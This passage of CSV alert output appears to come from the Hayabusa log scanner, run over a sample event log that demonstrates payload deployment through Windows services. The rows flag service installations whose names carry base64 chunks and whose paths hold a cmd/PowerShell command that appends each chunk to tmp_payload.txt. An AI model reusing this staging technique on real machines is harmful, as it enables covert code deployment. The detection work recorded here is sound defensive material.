Tchopper.evtx" +2021-11-03 08:16:22.040 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:22.040 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:22.040 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:23.478 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:23.478 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:23.478 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:24.954 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:24.954 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:24.954 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:26.398 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:26.398 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:26.398 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:27.853 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:27.853 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:27.853 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:29.297 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:29.297 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:29.297 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:30.766 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:30.766 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:30.766 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:32.227 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:32.227 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:32.227 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:33.680 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:33.680 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:33.680 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:35.189 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:35.189 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:35.189 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:36.641 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:36.641 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:36.641 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:38.089 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:38.089 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:38.089 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:39.555 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:39.555 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 